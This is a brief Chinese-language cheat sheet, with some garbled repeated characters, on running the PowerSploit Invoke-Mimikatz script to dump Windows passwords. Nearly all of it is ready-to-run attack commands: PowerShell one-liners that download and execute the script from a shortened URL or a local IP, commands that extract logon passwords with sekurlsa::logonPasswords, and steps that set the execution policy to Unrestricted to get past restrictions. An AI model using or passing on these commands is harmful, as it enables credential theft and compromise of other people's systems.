(1)Invoke-Mimikatz.ps1下載下傳位址
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
(2)具備網絡環境直接執行指令
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
(3)本地網絡環境
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/');Invoke-Mimikatz -DumpCreds"
(4)下載下傳本地執行
一句話執行:
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
有授權限制的:
Get-ExecutionPolicy //結果顯示restricted
Set-ExecutionPolicy Unrestricted //打開限制
Import-Module .\Invoke-Mimikatz.ps1 //導入指令
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //擷取密碼